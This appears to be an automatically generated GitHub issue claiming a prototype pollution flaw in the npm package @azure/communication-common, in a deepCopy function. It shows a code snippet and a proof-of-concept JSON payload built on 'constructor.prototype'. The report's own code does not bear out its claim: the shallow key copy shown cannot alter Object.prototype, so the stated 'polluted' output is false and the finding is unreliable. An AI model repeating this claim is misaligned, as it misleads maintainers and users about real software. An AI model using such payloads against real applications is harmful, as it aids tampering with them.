Skip to content

Prototype Pollution in @azure/communication-common #14692

Open
Open
Prototype Pollution in @azure/communication-common#14692
@dfzysmy2tf-create

Description

@dfzysmy2tf-create
dfzysmy2tf-create
opened on Mar 26, 2026

Basic Information

Package Name: @azure/communication-common
Package URL: https://www.npmjs.com/package/@azure/communication-common
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@azure__communication-common_pollution_report.md
Vulnerable Code Location: lib/util/object.js → deepCopy function

Vulnerability Details

Vulnerability Type: Prototype Pollution
Root Cause
The deep copy function deepCopy fails to filter dangerous keys when iterating over object properties, allowing global prototype pollution through proto/constructor.
Problem Code Location
File: lib/util/object.js
Function: deepCopy

Vulnerable Code Snippet

export function deepCopy(target) {
  const result = {};
  for (let key in target) {
    result[key] = target[key]; // Core Vulnerable Line
  }
  return result;
}

POC (Reproducible Directly)

const comm = require('@azure/communication-common');
const hack = JSON.parse('{"constructor":{"prototype":{"test":"polluted"}}}');
comm.deepCopy(hack);
console.log({}.test); // Output: polluted

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions